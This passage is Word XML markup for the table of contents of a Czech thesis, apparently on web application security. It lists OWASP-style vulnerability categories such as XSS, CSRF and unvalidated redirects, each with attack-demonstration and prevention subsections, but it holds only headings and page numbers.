        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Ukázky útoku</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327815 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>27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6" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.2.2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_Toc387327816 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</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17" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.3</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Cross-Site Scripting (XSS)</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327817 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>28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8" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.3.1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_Toc387327818 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>28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19" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.3.2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_Toc387327819 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>28</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20" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.4</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Nezabezpečená přímá reference objektů</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327820 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>29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1" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.4.1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_Toc387327821 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>29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2" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.4.2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_Toc387327822 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>29</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23" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.5</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Špatná konfigurace zabezpečení</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327823 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>30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4" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.5.1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_Toc387327824 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>30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5" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.5.2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_Toc387327825 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</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26" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.6</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Únik citlivých dat</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327826 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>31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7" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.6.1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_Toc387327827 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>31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28" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.6.2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_Toc387327828 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>31</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29" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.7</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Kontrola oprávnění na aplikační úrovni</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327829 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>32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0" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.7.1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_Toc387327830 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>32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1" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.7.2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_Toc387327831 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</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32" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.8</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Cross-Site Request Forgery (CSRF)</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327832 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>32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3" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.8.1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_Toc387327833 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>33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4" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.8.2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_Toc387327834 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</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35" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.9</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Komponenty se známými zranitelnostmi</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327835 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>34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6" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.9.1</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_Toc387327836 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>34</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37" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.10</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Neověřené přesměrování</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327837 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>34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8" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.10.1</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Ukázka útoku</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327838 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>34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39" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.10.2</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Jak předcházet této zranitelnosti</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327839 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>35</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="004D2639">
      <w:pPr>
        <w:pStyle w:val="Obsah1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc387327840" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Praktická část</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327840 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</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841" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:caps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>funkcionalita aplikace</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327841 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>37</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42" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>5.1</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Funkční požadavky</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327842 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>37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3" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>5.1.1</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
